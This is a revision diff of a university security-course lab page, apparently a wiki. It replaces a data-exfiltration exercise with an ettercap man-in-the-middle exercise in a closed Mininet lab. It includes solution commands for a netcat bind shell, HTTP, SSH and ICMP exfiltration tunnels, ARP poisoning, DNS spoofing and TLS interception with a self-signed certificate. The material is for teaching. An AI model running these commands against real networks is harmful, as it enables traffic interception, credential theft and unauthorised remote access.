Differences
This shows you the differences between two versions of the page.
|
cdci:labs:6 [2020/03/17 01:27] mihai.chiroiu [06. [20p] ICMP exfiltration] |
cdci:labs:6 [2025/01/21 19:23] (current) mihai.chiroiu |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== Lab06. Data exfiltration ====== | + | ====== Lab06. Man-in-the-middle attack ====== |
| + | |||
| + | <note warning> | ||
| + | Important read to be graded! | ||
| + | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | ||
| + | </note> | ||
| ===== Objectives ===== | ===== Objectives ===== | ||
| - | * Basic usage of the netcat tool | + | * MITM using ettercap tool |
| - | * Basic usage of the ssh tool | + | * Wireshark usage for protocol dissection - DNS |
| - | * Data exfiltration through DNS, HTTP, ICMP and UDP | + | * Understanding attacks on ARP |
| + | * Learning different types of MITM | ||
| ===== Topology ===== | ===== Topology ===== | ||
| - | {{ :cdci:labs:cdci_lab06-exfiltration-topology.png?direct&600 |}} | + | {{ :cdci:labs:cdci_lab04-mitm-topology.png?direct&600 |}} |
| ===== Tasks ===== | ===== Tasks ===== | ||
| Line 15: | Line 21: | ||
| First, make sure that your virtual machine is updated (run the provided update.sh script, or create one). | First, make sure that your virtual machine is updated (run the provided update.sh script, or create one). | ||
| - | <code> | ||
| - | root@cdci:/# cat update.sh | ||
| - | #!/bin/bash | ||
| - | # (c) Mihai Chiroiu - CDCI | ||
| - | git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | + | <note tip> |
| - | git config user.email "student@upb.ro" | + | There is a small with starting the docker in privileged mode, so please edit this file first: |
| + | <code> | ||
| + | root@cdci:/# vim ~/containernet/mininet/node.py (line 828, privileged = True) | ||
| </code> | </code> | ||
| + | </note> | ||
| Next, in one terminal start the provided Mininet topology. | Next, in one terminal start the provided Mininet topology. | ||
| <code> | <code> | ||
| - | root@cdci:/# cd cdci/lab06 | + | root@cdci:/# cd cdci/lab04 |
| root@cdci:/# /usr/bin/python3 topology.py | root@cdci:/# /usr/bin/python3 topology.py | ||
| </code> | </code> | ||
| Line 34: | Line 39: | ||
| ==== 02. [5p] Internet connectivity ==== | ==== 02. [5p] Internet connectivity ==== | ||
| - | Before you begin, make sure that you have Internet connectivity on all two nodes. R1 should be the gateway. Write down the IP addresses of all the nodes. Use the provided scripts to access the nodes. | + | Before you begin, make sure that you have Internet connectivity on all two nodes (attacker and victim). R1 should be the gateway for the Attacker and Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway). Use the provided scripts to access the nodes. |
| <code> | <code> | ||
| - | root@ip-172-30-0-165:/# ./h1.sh | + | root@ip-172-30-0-165:/# ./attacker_bash.sh |
| - | root@h1:/# | + | root@attacker:/# |
| - | root@ip-172-30-0-165:/# ./h2.sh | + | root@ip-172-30-0-165:/# ./victim_bash.sh |
| - | root@h2:/# | + | root@victim:/# |
| - | + | ||
| - | root@ip-172-30-0-165:/# ./ids.sh | + | |
| - | root@IDS:/# | + | |
| </code> | </code> | ||
| - | ==== 03. [15p] Plain text exfiltration ==== | + | ==== 03. [30p] ARP poisoning MITM attack ==== |
| - | Netcat, also known as the 'TCP/IP Swiss Army Knife,' can be used to send data between two hosts. Create a client/server connection over port 8080. By default, the data send from the client will be printed on the server. | + | The goal of this exercise is to pass all the victim's traffic through the attacker's machine. From the Attacker node start an ARP poisoning mitm attack against the Victim machine using ettercap tool. Use “ping” tool from Victim and make sure that all traffic (including to outside) goes through the Attacker’s node (use extra verbose option for ettercap). |
| - | + | ||
| - | The switch in the topology is configured to mirror all traffic to IDS. Use this feature to save the traffic in a PCAP file using 'tcpdump'. Use Netcat to grant the client shell access on the server (hint: '-c' param on the server side). | + | |
| <note tip> | <note tip> | ||
| - | For tcpdump use the '-Z root' params in order to override the privileges and allow saving data as root. | + | Make sure that you enable remote sniffing. To exit ettercap simply press Q. |
| - | </note> | + | </note> |
| - | Download the previously saved PCAP file to your local computer and analyse it using Wireshark. Use the "Follow TCP stream" option from Wireshark to observe the traffic flow between the two hosts. | + | Use tcpdump to save all the traffic from the victim and analyze it using Wireshark. Try to answer the following questions: |
| - | + | * Can you spot the Gratuitous ARP packet sent when infecting the victim? | |
| - | <note tip> | + | * Look into the layer 2 of the packets and see how the destination MAC address has changed under the attack. |
| - | To copy data from inside the IDS note to the virtual machine use the provided script. | + | * Can you spot the Gratuitous ARP packet when the infection is stopped? |
| - | <code> | + | |
| - | ./copy_from_node.sh IDS /root/traffic.pcap /home/ubuntu/ | + | |
| - | </code> | + | |
| - | </note> | + | |
| <solution> | <solution> | ||
| <code> | <code> | ||
| - | root@h2:/# nc -l -p 8080 | + | root@attacker:/# ettercap -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// |
| - | test | + | |
| - | root@h1:/# nc 192.168.16.3 8080 | + | |
| - | test | + | |
| - | root@h2:/# nc -l -p 8080 -c /bin/bash | + | ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team |
| - | [...] | + | |
| - | root@h1:/# nc 192.168.16.3 8080 | + | Listening on: |
| - | ls | + | attacker-eth0 -> FE:14:85:E7:5F:D0 |
| - | bin | + | 192.168.16.2/255.255.255.0 |
| - | boot | + | * |==================================================>| 100.00 % |
| - | dev | + | |
| [...] | [...] | ||
| + | |||
| + | Sat Mar 14 20:39:26 2020 [835705] | ||
| + | D2:5D:2C:AD:D4:F5 --> FE:14:85:E7:5F:D0 | ||
| + | 192.168.16.100:0 --> 8.8.8.8:0 | P (0) | ||
| + | | ||
| + | | ||
| + | root@attacker:/# tcpdump -n -i Attacker-eth0 -w mitm.pcap | ||
| </code> | </code> | ||
| </solution> | </solution> | ||
| - | ==== 04. [10p] HTTP exfiltration ==== | + | ==== 04. [10p] Traffic dissection ==== |
| - | While Netcat is a good tool, the traffic that it sends can be easily removed by any Deep Packet Inspection solutions because it is a simple DATA over TCP connection. Now, use the httptunnel (hts & htc) suite to create a HTTP tunnel between the two nodes. Use this tunnel to establish a client/server connection and exfiltrate data (similar to the previous exercise). | + | Investigate the following traffic as it is generated by the Victim node: |
| + | * HTTP and DNS while under MITM attack. Can you use Wireshark and rebuild/export the HTML pages that the victim opened (use wget or curl)?. | ||
| - | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). | + | <note tip> |
| + | Transfer the pcap file to your local computer and open it in wireshark. Then select File->Export HTML Objects. | ||
| + | </note> | ||
| - | <solution> | + | ==== 05. [20p] Raw packets altering ==== |
| - | <code> | + | |
| - | root@h2:/# hts -F 127.0.0.1:8080 80 | + | |
| - | root@h2:/# netstat -nltp | + | |
| - | Active Internet connections (only servers) | + | |
| - | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | + | |
| - | tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 90/hts | + | |
| - | root@h2:/# nc -l -p 8080 -k | + | |
| - | TEST | + | |
| - | root@h1:/# htc -F8080 192.168.16.3:80 | + | Ettercap filters can also be used to modify packets as they pass through the attacker’s node. Use the provided filter to change icmp type from echo to reply (Hint: [[https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml]]). |
| - | root@h1:/# nc 127.0.0.1 8080 | + | * You should observe the changes on the victim (no more replies). |
| - | TEST | + | * Use tcpdump on the attacker to inspect the changes. |
| - | </code> | + | <note tip> |
| - | </solution> | + | [[https://linux.die.net/man/8/etterfilter]] |
| - | ==== 05. [15p] SSH exfiltration ==== | + | </note> |
| - | + | ||
| - | As seen, the previous solutions send data in clear text. Create an ssh tunnel and use it to exfiltrate data via a similar client/server Netcat architecture. For this, you have to use one node as an SSH server and the second one as a client. Use the following configuration on the SSH Server | + | |
| <code> | <code> | ||
| - | root@h2:/# vim /etc/ssh/sshd_config | + | cat icmp.filter |
| - | PasswordAuthentication yes | + | if (ip.proto == ICMP) { |
| - | PermitRootLogin yes | + | msg("Changing ICMP type!\n"); |
| - | + | replace("8.8.8.8", "8.8.4.4"); | |
| - | root@h2:/# service ssh restart | + | } |
| - | root@h2:/# netstat -nltp | + | etterfilter icmp.filter -o icmp.ef |
| - | Active Internet connections (only servers) | + | |
| - | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | + | |
| - | tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 198/sshd | + | |
| </code> | </code> | ||
| - | |||
| - | <note> | ||
| - | In general this might not be a good idea ([[http://sites.inka.de/bigred/devel/tcp-tcp.html|http://sites.inka.de/bigred/devel/tcp-tcp.html]]). | ||
| - | </note> | ||
| - | |||
| - | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). | ||
| <solution> | <solution> | ||
| <code> | <code> | ||
| - | root@h2:/# nc -l -p 8080 -k | + | cat icmp.filter |
| - | TEST | + | if (ip.proto == ICMP && icmp.type == 0) { |
| - | + | msg("Changing address!\n"); | |
| - | root@h1:/# ssh -N -L 8080:127.0.0.1:8080 root@192.168.16.3 -f | + | icmp.type = 8; |
| - | root@192.168.16.3's password: | + | } |
| - | bind: Cannot assign requested address | + | etterfilter icmp.filter -o icmp.ef |
| - | root@h1:/# nc 127.0.0.1 8080 | + | ettercap -T -F icmp.ef -M ARP:remote /192.168.16.100// /192.168.16.1// |
| - | TEST | + | |
| </code> | </code> | ||
| </solution> | </solution> | ||
| - | ==== 06. [20p] ICMP exfiltration ==== | ||
| - | Another protocol that can be used to exfiltrate data is ICMP. You can use the [[https://linux.die.net/man/8/ptunnel|ptunnel]] application and tunnel the Netcat client/server connection over ICMP. | ||
| - | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). For this exercise we strongly encourage you to view the data in Wireshark. | + | ==== 06. [10p] DNS traffic altering ==== |
| - | <solution> | + | Another interesting plugin of Ettercap is DNS spoofing. Config it such that any queries for the “facebook.com” domain name are translated into “127.0.0.1”. |
| - | <code> | + | |
| - | root@h2:/# ptunnel & | + | |
| - | [1] 331 | + | |
| - | root@h2:/# [inf]: Starting ptunnel v 0.72. | + | |
| - | [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no> | + | |
| - | [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr> | + | |
| - | [inf]: Forwarding incoming ping packets over TCP. | + | |
| - | [inf]: Ping proxy is listening in privileged mode. | + | |
| - | root@h2:/# | + | |
| - | root@h2:/# | + | |
| - | root@h2:/# nc -l -p 8080 -k | + | |
| - | [inf]: Incoming tunnel request from 192.168.16.2. | + | |
| - | [inf]: Starting new session to 127.0.0.1:8080 with ID 18665 | + | |
| - | TEST | + | |
| - | [inf]: Received session close from remote peer. | + | |
| - | [inf]: | + | |
| - | Session statistics: | + | |
| - | [inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 13/ 1/ 0 Loss: 0.0% | + | |
| - | [inf]: | + | |
| - | root@h2:/# | + | |
| + | <note tip> | ||
| + | [[https://linux.die.net/man/8/ettercap_plugins]] | ||
| + | </note> | ||
| - | root@h1:/# kill -9 150 | + | <solution> |
| - | root@h1:/# netstat -nltp | + | <code> |
| - | Active Internet connections (only servers) | + | root@attacker:~# cat /etc/ettercap/etter.dns |
| - | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | + | www.facebook.com A 127.0.0.1 |
| - | root@h1:/# ptunnel -p 192.168.16.3 -lp 8080 -da 127.0.0.1 -dp 8080 & | + | root@attacker:/# ettercap -P dns_spoof -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// |
| - | [2] 161 | + | |
| - | root@h1:/# [inf]: Starting ptunnel v 0.72. | + | |
| - | [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no> | + | |
| - | [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr> | + | |
| - | [inf]: Relaying packets from incoming TCP streams. | + | |
| - | root@h1:/# netstat -nltp | + | Listening on: |
| - | Active Internet connections (only servers) | + | attacker-eth0 -> 1E:D4:8A:37:43:CD |
| - | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | + | 192.168.16.2/255.255.255.0 |
| - | tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 161/ptunnel | + | * |==================================================>| 100.00 % |
| - | root@h1:/# nc 127.0.0.1 8080 | + | Activating dns_spoof plugin... |
| - | [inf]: Incoming connection. | + | |
| - | [evt]: No running proxy thread - starting it. | + | |
| - | [inf]: Ping proxy is listening in privileged mode. | + | |
| - | TEST | + | |
| - | ^C | + | Sat Mar 14 21:22:44 2020 [161164] |
| - | root@h1:/# [inf]: Connection closed or lost. | + | CE:82:B8:0E:6B:72 --> 1E:D4:8A:37:43:CD |
| - | [inf]: Session statistics: | + | UDP 192.168.16.100:48445 --> 172.30.0.2:53 | (34) |
| - | [inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 25/ 4/ 0 Loss: 0.0% | + | A............www.facebook.com.....dns_spoof: A [www.facebook.com] spoofed to [127.0.0.1] TTL [3600 s] |
| - | root@h1:/# | ||
| - | root@h1:/# | ||
| - | root@h1:/# netstat -nltp | ||
| - | Active Internet connections (only servers) | ||
| - | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
| - | tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 161/ptunnel | ||
| + | root@victim:/# nslookup www.facebook.com | ||
| + | Non-authoritative answer: | ||
| + | www.facebook.com canonical name = star-mini.c10r.facebook.com. | ||
| + | Name: star-mini.c10r.facebook.com | ||
| + | Address: 157.240.221.35 | ||
| + | [...] | ||
| + | root@victim:/# nslookup www.facebook.com | ||
| + | Name: www.facebook.com | ||
| + | Address: 127.0.0.1 | ||
| </code> | </code> | ||
| </solution> | </solution> | ||
| + | ==== 07. [20p] HTTPS traffic inspection ==== | ||
| - | ==== 07. [20p] DNS exfiltration ==== | + | Unfortunately, HTTPS traffic cannot be inspected, or can it :). We will try to use ettercap and observe changes in the certificate chain when MITM attack is active. |
| + | * First, use the “openssl s_client” tool (or other) to see the certificates path for the “www.google.com” website. <code> root@victim:~# openssl s_client -showcerts www.google.com:443 | ||
| + | CONNECTED(00000005) | ||
| + | depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign | ||
| + | verify return:1 | ||
| + | depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1 | ||
| + | verify return:1 | ||
| + | depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com | ||
| + | verify return:1 | ||
| + | </code> | ||
| + | * Next, run ettercap without TLS MITM (-S). | ||
| + | * Now, run ettercap including TLS MITM. | ||
| - | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). | + | <note tip> |
| + | For the TLS MITM you will require a certificate and a private key to be used when running ettercap (hint: [[https://manpages.debian.org/jessie/ettercap-common/ettercap.8.en.html|--certificate]]). Use the following code to create the private key and certificate. | ||
| + | <code> | ||
| + | root@attacker:~# openssl genrsa -out hacker.pem 2048 | ||
| + | root@attacker:~# openssl req -x509 -new -key hacker.pem -sha256 -days 365 -out hacker.crt | ||
| + | </code> | ||
| + | </note> | ||
| - | <solution> | + | <note tip> |
| + | For the MITM TLS attack we have to allow ettercap to run as root user and enable iptables configurations. This is required to allow ettercap SSL filter to receive and decode the TLS traffic. Modify the configuration file, “/etc/ettercap/etter.conf”, with the following. | ||
| <code> | <code> | ||
| + | ec_uid = 0 | ||
| + | ec_gid = 0 | ||
| + | # if you use iptables: | ||
| + | redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | ||
| + | redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | ||
| + | redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | ||
| + | redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | ||
| </code> | </code> | ||
| - | </solution> | + | </note> |
| + | <solution> | ||
| + | <code> | ||
| + | root@attacker:~# ettercap -E -T -M ARP:remote --private-key hacker.pem --certificate hacker.crt /192.168.16.100// /192.168.16.1// | ||
| + | |||
| + | root@victim:~# openssl s_client -showcerts www.google.com:443 | ||
| + | CONNECTED(00000005) | ||
| + | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | ||
| + | verify error:num=18:self signed certificate | ||
| + | verify return:1 | ||
| + | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | ||
| + | verify return:1 | ||
| + | --- | ||
| + | </code> | ||
| + | </solution> | ||
